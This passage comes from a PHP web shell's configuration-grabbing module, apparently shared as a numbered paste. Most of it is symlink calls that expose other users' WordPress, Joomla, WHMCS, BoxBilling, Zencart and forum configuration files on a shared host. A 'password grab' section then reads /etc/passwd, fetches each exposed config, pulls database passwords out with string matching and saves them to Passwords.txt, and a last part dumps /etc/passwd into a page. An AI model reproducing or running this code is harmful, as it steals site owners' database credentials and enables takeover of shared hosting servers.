  1911. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1912. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1913. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1914. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1915. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1916. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1917. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1918. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1919. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1920. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1921. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1922. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1923. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1924. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1925. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1926. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1927. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1928. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1929. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1930. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1931. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1932. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1933. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1934. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1935. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1936. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1937. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1938. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1939. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1940. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1941. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1942. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1943. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1944. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1945. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1946. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1947. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1948. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1949. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1950. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1951. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1952. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1953. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1954. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1955. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1956. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1957. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1958. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1959. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1960. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1961. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1962. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1963. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1964. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1965. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1966. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1967. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1968. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1969. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1970. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1971. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1972. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1973. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1974. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1975. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1976. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1977. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1978. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1979. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1980. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1981. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1982. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1983.  
  1984. //Home4
  1985.  
  1986. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1987. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1988. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1989. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1990. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1991. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1992. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1993. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1994. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1995. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1996. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1997. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1998. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1999. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2000. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2001. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2002. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2003. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2004. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2005. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2006. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2007. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2008. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2009. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2010. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2011. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2012. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2013. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2014. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2015. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2016. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2017. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2018. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2019. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2020. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2021. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2022. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2023. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2024. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2025. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2026. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2027. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2028. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2029. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2030. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2031. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2032. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2033. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2034. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2035. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2036. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2037. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2038. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2039. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2040. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2041. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2042. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2043. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2044. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2045. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2046. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2047. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2048. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2049. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2050. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2051. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2052. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2053. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2054. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2055. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2056. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2057. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2058. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2059. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2060. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2061. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2062. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2063. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2064. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2065. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2066. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2067. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2068. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2069. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2070. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2071. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2072. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2073. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2074. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2075. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2076. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2077. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2078. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2079. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2080. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2081. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2082. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2083. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2084. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2085. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2086. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2087. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2088. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2089. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2090. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2091. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2092. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2093. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2094. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2095. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2096. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2097. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2098. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2099. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2100. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2101. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2102. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2103. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2104. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2105. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2106. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2107. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2108. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2109. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2110. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2111. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2112. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2113. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2114. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2115. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2116. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2117. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2118. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2119. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2120. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2121. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2122. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2123. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2124. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2125. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2126. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2127. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2128. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2129. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2130. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2131. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2132. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2133. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2134. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2135. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2136. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2137. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2138. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2139. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2140. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2141. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2142. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2143. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2144. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2145. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2146. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2147. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2148. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2149. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2150. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2151. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2152. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2153. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2154. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2155. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2156. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2157. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2158. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2159. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2160. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2161. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2162. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2163. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2164. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2165. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2166.  
  2167. }
  2168.  
  2169. //password grab
  2170.  
  2171. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  2172. {
  2173.  
  2174. $ar0=explode($marqueurDebutLien, $text);
  2175. $ar1=explode($marqueurFinLien, $ar0[1]);
  2176. $ar=trim($ar1[0]);
  2177. return $ar;
  2178. }
  2179.  
  2180. $ffile=fopen('Passwords.txt','a+');
  2181.  
  2182.  
  2183. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/viewsymcnf/";
  2184. $re=$r;
  2185. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
  2186.  
  2187. $users=file("/etc/passwd");
  2188. foreach($users as $user)
  2189. {
  2190.  
  2191. $str=explode(":",$user);
  2192. $usersss=$str[0];
  2193. foreach($confi as $co)
  2194. {
  2195.  
  2196.  
  2197. $uurl=$re.$usersss.$co;
  2198. $uel=$uurl;
  2199.  
  2200. $ch = curl_init();
  2201.  
  2202. curl_setopt($ch, CURLOPT_URL, $uel);
  2203. curl_setopt($ch, CURLOPT_HEADER, 1);
  2204. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2205. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2206. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  2207. $result['EXE'] = curl_exec($ch);
  2208. curl_close($ch);
  2209. $uxl=$result['EXE'];
  2210.  
  2211.  
  2212. if($uxl && preg_match('/table_prefix/i',$uxl))
  2213. {
  2214.  
  2215. //Wordpress
  2216.  
  2217. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  2218. if(!empty($dbp))
  2219. $pass=$dbp."\n";
  2220. fwrite($ffile,$pass);
  2221.  
  2222. }
  2223. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  2224. {
  2225.  
  2226. //WHMCS
  2227.  
  2228. $dbp=entre2v2($uxl,"db_password = '","';");
  2229. if(!empty($dbp))
  2230. $pass=$dbp."\n";
  2231. fwrite($ffile,$pass);
  2232.  
  2233. }
  2234.  
  2235.  
  2236. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  2237. {
  2238.  
  2239. //Joomla
  2240.  
  2241. $db=entre2v2($uxl,"password = '","';");
  2242. if(!empty($db))
  2243. $pass=$db."\n";
  2244. fwrite($ffile,$pass);
  2245. }
  2246. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  2247. {
  2248.  
  2249. //Vbulletin
  2250.  
  2251. $db=entre2v2($uxl,"password'] = '","';");
  2252. if(!empty($db))
  2253. $pass=$db."\n";
  2254. fwrite($ffile,$pass);
  2255.  
  2256. }
  2257. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  2258. {
  2259.  
  2260. //Other
  2261.  
  2262. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  2263. if(!empty($db))
  2264. $pass=$db."\n";
  2265. fwrite($ffile,$pass);
  2266. }
  2267. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2268. {
  2269.  
  2270. //Other
  2271.  
  2272. $db=entre2v2($uxl,"dbpass = '","';");
  2273. if(!empty($db))
  2274. $pass=$db."\n";
  2275. fwrite($ffile,$pass);
  2276. }
  2277. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2278. {
  2279.  
  2280. //Other
  2281.  
  2282. $db=entre2v2($uxl,"dbpass = '","';");
  2283. if(!empty($db))
  2284. $pass=$db."\n";
  2285. fwrite($ffile,$pass);
  2286.  
  2287. }
  2288. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2289. {
  2290.  
  2291. //Other
  2292.  
  2293. $db=entre2v2($uxl,"dbpass = \"","\";");
  2294. if(!empty($db))
  2295. $pass=$db."\n";
  2296. fwrite($ffile,$pass);
  2297. }
  2298.  
  2299.  
  2300. }
  2301. }
  2302. echo "<center>
  2303. <a href=\"viewsymcnf/root/\">Root Server</a>
  2304. <br><a href=\"viewsymcnf/Passwords.txt\">Passwords</a>
  2305. <br><a href=\"viewsymcnf/\">Configurations</a></center>";
  2306. }
  2307. else
  2308. {
  2309. echo "<center>
  2310. <form method=\"POST\">
  2311. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
  2312. $file = '/etc/passwd';
  2313. $read = @fopen($file, 'r');
  2314. if ($read){
  2315. $body = @fread($read, @filesize($file));
  2316. echo "".htmlentities($body)."";
  2317. }
  2318. elseif(!$read)
  2319. {
  2320. $read = @show_source($file) ;
  2321. }
  2322. elseif(!$read)
  2323. {
  2324. $read = @highlight_file($file);
